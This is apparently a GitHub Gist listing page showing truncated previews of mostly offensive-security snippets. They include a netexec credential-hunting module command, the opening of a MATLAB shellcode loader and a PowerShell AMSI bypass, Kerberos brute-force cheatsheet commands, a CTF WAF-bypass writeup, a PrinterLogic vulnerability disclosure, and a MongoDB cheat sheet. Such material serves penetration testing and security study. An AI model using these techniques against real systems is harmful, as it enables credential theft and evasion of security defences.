tanaka tanaka-geek

  • Tokyo
@nullenc0de
nullenc0de / task_explorer
Created November 8, 2024 17:18
netexec smb TARGET -u ADMIN -p PASS -M task_explorer -o EXPORT_XML=True OUTPUT_DIR=./tasks SCAN_CREDS=True
from datetime import datetime
import xml.etree.ElementTree as ET
from typing import List, Dict, Optional
import os
import re
from impacket.dcerpc.v5.dcom.wmi import WBEMSTATUS
from nxc.helpers.logger import highlight
class TaskVulnerability:
    def __init__(self, name: str, path: str, command: str, author: str,
@Wra7h
Wra7h / CreateThread.m
Last active September 19, 2023 05:19
Matlab Shellcode Loader
% Wra7h/FlavorTown
% MATLAB version: R2023a
% Tested on Win10 x64
if not(libisloaded('kernel32'))
loadlibrary('kernel32.dll', @kernel32proto);
end
if not(libisloaded('msvcrt'))
loadlibrary('msvcrt.dll', @msvcrtproto);
@wireghoul
wireghoul / Printerlogic-disclosure.md
Last active May 27, 2023 23:24
Printerlogic-disclosure

PrinterLogic SaaS, multiple vulnerabilities

PrinterLogic's Enterprise Print Management software allows IT professionals to simplify printer driver management and empower end users. -- https://www.printerlogic.com/

Background

The following findings were identified by performing both dynamic testing of the PrinterLogic SaaS platform and code analysis of the source code contained in the virtual appliance available for download from the PrinterLogic website (Build 1.0.757: July 29th, 2022).

@api0cradle
api0cradle / check_vulnerabledrivers.ps1
Created May 19, 2023 14:13
A quick script to check for vulnerable drivers. Compares drivers on system with list from loldrivers.io
# Simple script to check drivers in C:\windows\system32\drivers against the loldrivers list
# Author: Oddvar Moe - @oddvar.moe
$drivers = get-childitem -Path c:\windows\system32\drivers
$web_client = new-object system.net.webclient
$loldrivers = $web_client.DownloadString("https://www.loldrivers.io/api/drivers.json") | ConvertFrom-Json
Write-output("Checking {0} drivers in C:\windows\system32\drivers against loldrivers.io json file" -f $drivers.Count)
foreach ($lol in $loldrivers.KnownVulnerableSamples)
{
@GeisericII
GeisericII / Get-LoggedOn.py
Last active November 1, 2024 19:35
Stupid simple script copied and pasted from reg.py/lookupsid and inspired from itm4n's session enum via registry
#!/usr/bin/python3
from __future__ import division
from __future__ import print_function
import re
import codecs
import logging
import time
import argparse
import sys
from impacket import version
@terjanq
terjanq / README.md
Last active June 14, 2024 14:36
TokyoWesterns CTF 2020 | writeups by @terjanq

Urlcheck v1 (98 points, 160 solves)

The goal was to bypass WAF protection to access local resources.

app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')

def valid_ip(ip):
 matches = app.re_ip.match(ip)
@FatRodzianko
FatRodzianko / my-am-bypass.ps1
Last active August 15, 2024 11:52
small modification to Rastemouse's AmsiScanBuffer bypass to use bytes. Uses different opcode bytes
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
@bradtraversy
bradtraversy / mongodb_cheat_sheet.md
Last active November 17, 2024 10:01
MongoDB Cheat Sheet

Show All Databases

show dbs

Show Current Database

@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@thesubtlety
thesubtlety / sans-sec660-recommended-reading.md
Created January 5, 2019 00:08
SANS SEC660 GXPN Recommended Reading